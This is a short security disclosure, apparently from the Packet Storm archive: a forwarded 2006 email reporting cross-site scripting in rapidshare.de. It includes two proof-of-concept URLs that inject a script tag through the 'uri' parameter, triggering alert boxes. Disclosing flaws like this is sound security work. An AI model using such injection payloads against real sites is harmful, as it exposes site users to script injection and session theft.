The file hosting company rapidshare.de suffers from XSS.
1fdb3fdcf2c1703ef2f288d31623370f558d9fdec694b9db6ad888f6fd180975
----- Forwarded message from "Giel S." <ironfist99@gmail.com> -----
Delivered-To: todd@packetstormsecurity.org
Delivered-To: staff@packetstormsecurity.org
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=beta; d=gmail.com;
h=received:message-id:date:from:to:subject:mime-version:content-type;
b=JHl38kCdNMoslfO76tAst/ztrFUtJ53rA6GRz4tCixBwF9f1Ae9++DujXYcx//nxItaEttUde73I6u12t2gn8kLSca2Vn8igQd+RzNhuOwJXybBpadlL0tiEbWReQosXQu6qGLboY2QPOYRyJLDOj3I91V2Q5WVE00WHDGZwyLI=
Date: Mon, 13 Mar 2006 19:13:11 +0100
From: "Giel S." <ironfist99@gmail.com>
To: staff@packetstormsecurity.org
Subject: Rapidshare XSS
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on
www.packetstormsecurity.org
X-Spam-Level:
X-Spam-Status: No, hits=-3.8 required=5.0 tests=BAYES_00,FROM_ENDS_IN_NUMS,
HTML_MESSAGE autolearn=no version=2.63
Hi,
I've discovered a (new) Rapidshare.de cross site scripting attack:
http://rapidshare.de/?uri=/files/11707529%2%3Cscript%3Ealert%28%22Another%20XSS%20in%20rapidshare%2C%20found%20by%20Ironfist%22%29%3B%3C/script%3E&dl.start=Free
http://rapidshare.de/?uri=%2Ffiles%2F15307201%2F%3Cscript%3Ealert(%22Premium%20zone%20also%20not%20secure%22);%3C/script%3E&dl.start=PREMIUM
Maybe an idea for the advisory section?
Greetings,
Ironfist
----- End forwarded message -----